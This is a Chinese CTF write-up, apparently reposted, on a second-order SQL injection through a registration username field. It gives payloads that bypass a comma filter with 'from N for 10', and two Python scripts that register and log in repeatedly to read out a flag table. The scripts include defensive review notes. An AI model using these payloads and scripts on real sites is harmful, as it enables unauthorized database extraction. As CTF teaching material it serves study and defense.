• 过滤了,分割时使用from 1 for 10绕过

    示例

  • 0'+hex编码要读取的信息+'0

要进行二次编码,只做一次编码时结果会被截断。

QQ截图20211001101644

QQ截图20211001101708

解法1

payload:0'+(select substr(hex(hex((select * from flag))) from 1 for 10))+'0

脚本

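#coding:utf-8
"""Chunked read-out script for the CTF exercise described on this page.

For each of 100 offsets the script registers a throw-away account whose
username is the page's payload (a SQL expression selecting 10 characters
of the doubly hex-encoded content of the ``flag`` table), logs in with
that account, and prints the text of the first ``<span>`` in the login
response.

Review notes (defensive reading):

* The value only shows up after login, so the username stored at
  registration is presumably concatenated into a later SQL statement
  (second-order injection) -- TODO confirm against the challenge source.
  The server-side fix is to bind the username as a parameter in every
  statement that writes or re-reads it, and to treat stored values as
  untrusted input.
* What this traffic looks like in logs: a burst of registrations with
  sequential e-mail addresses and usernames containing quotes and SQL
  keywords, each followed about a second later by a login.
"""
import re
import time

import requests
from bs4 import BeautifulSoup

# Seconds to wait for each HTTP response; without a timeout a stalled
# connection would hang the loop forever.
REQUEST_TIMEOUT = 10

# The original script named this variable ``str``, which shadows the
# builtin; it is only referenced by the commented-out accumulation below.
collected = ''

headers = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
    'Referer': "https://www.lagou.com/jobs/list_python/p-city_252?px=default&;gx=%E5%85%A8%E8%81%8C&gj=&xl=%E6%9C%AC%E7%A7%91&isSchoolJob=1",
    'Accept': 'application/json, text/javascript, */*; q=0.01',
}

url_log = 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/login.php'
url_reg = 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/register.php'

for i in range(0, 100):
    # hex(hex(...)) is the double encoding the page calls for (a single
    # encoding is reported to be truncated -- presumably at the first
    # a-f letter when the string is coerced to a number; TODO confirm).
    # ``substr(... from N for 10)`` is the comma-free form the page uses
    # because of the filter it mentions.
    payload = "0'+(select substr(hex(hex((select * from flag))) from {} for 10))+'0".format(1 + i * 10)
    #print(payload)
    data_reg = {"email": "11111231{}@qq.com".format(i), "username": payload, "password": "123"}
    data_log = {"email": "11111231{}@qq.com".format(i), "password": "123"}

    res1 = requests.post(url_reg, headers=headers, data=data_reg, timeout=REQUEST_TIMEOUT)
    time.sleep(1)
    res = requests.post(url_log, headers=headers, data=data_log, timeout=REQUEST_TIMEOUT)

    soup = BeautifulSoup(res.text, 'html.parser')
    if soup.span is None:
        # The original dereferenced soup.span unconditionally and died
        # with AttributeError when the response had no <span>.
        print("no <span> in login response for index {}; stopping".format(i))
        break
    print(soup.span.text)
    #collected=collected+','+soup.span.text
    #print(collected)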

解法2

payload:0'+ascii(substr((select * from flag) from {} for 1))+'0

脚本

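#coding:utf-8
"""Character-by-character read-out script for the CTF exercise on this page.

For positions 1..99 the script registers a throw-away account whose
username is the page's second payload (a SQL expression yielding the
ASCII code of one character of the ``flag`` table content), logs in with
that account, prints the text of the first ``<span>`` in the login
response, and appends it to a comma-separated running string.

The page contained this script twice, verbatim and fused onto one line;
only one copy is kept here.

Review notes (defensive reading):

* The value only shows up after login, so the username stored at
  registration is presumably concatenated into a later SQL statement
  (second-order injection) -- TODO confirm against the challenge source.
  The server-side fix is to bind the username as a parameter in every
  statement that writes or re-reads it, and to treat stored values as
  untrusted input.
* What this traffic looks like in logs: a burst of registrations with
  sequential e-mail addresses and usernames containing quotes and SQL
  keywords, each followed about a second later by a login.
"""
import re
import time

import requests
from bs4 import BeautifulSoup

# Seconds to wait for each HTTP response; without a timeout a stalled
# connection would hang the loop forever.
REQUEST_TIMEOUT = 10

# Comma-separated values read so far. The original called this ``str``,
# which shadows the builtin type for the rest of the module.
collected = ''

headers = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
    'Referer': "https://www.lagou.com/jobs/list_python/p-city_252?px=default&;gx=%E5%85%A8%E8%81%8C&gj=&xl=%E6%9C%AC%E7%A7%91&isSchoolJob=1",
    'Accept': 'application/json, text/javascript, */*; q=0.01',
}

url_log = 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/login.php'
url_reg = 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/register.php'

for i in range(1, 100):
    # ``substr(... from N for 1)`` is the comma-free form the page uses
    # because of the filter it mentions; ascii() turns the character
    # into a number so it survives the '0'+...+'0' arithmetic.
    payload = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i)
    #print(payload)
    data_reg = {"email": "111112{}@qq.com".format(i), "username": payload, "password": "123"}
    data_log = {"email": "111112{}@qq.com".format(i), "password": "123"}

    res1 = requests.post(url_reg, headers=headers, data=data_reg, timeout=REQUEST_TIMEOUT)
    time.sleep(1)
    res = requests.post(url_log, headers=headers, data=data_log, timeout=REQUEST_TIMEOUT)

    soup = BeautifulSoup(res.text, 'html.parser')
    if soup.span is None:
        # The original dereferenced soup.span unconditionally and died
        # with AttributeError when the response had no <span>.
        print("no <span> in login response for index {}; stopping".format(i))
        break
    print(soup.span.text)
    collected = collected + ',' + soup.span.text
    print(collected)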

转自:https://www.cnblogs.com/da-wn/p/15359314.html
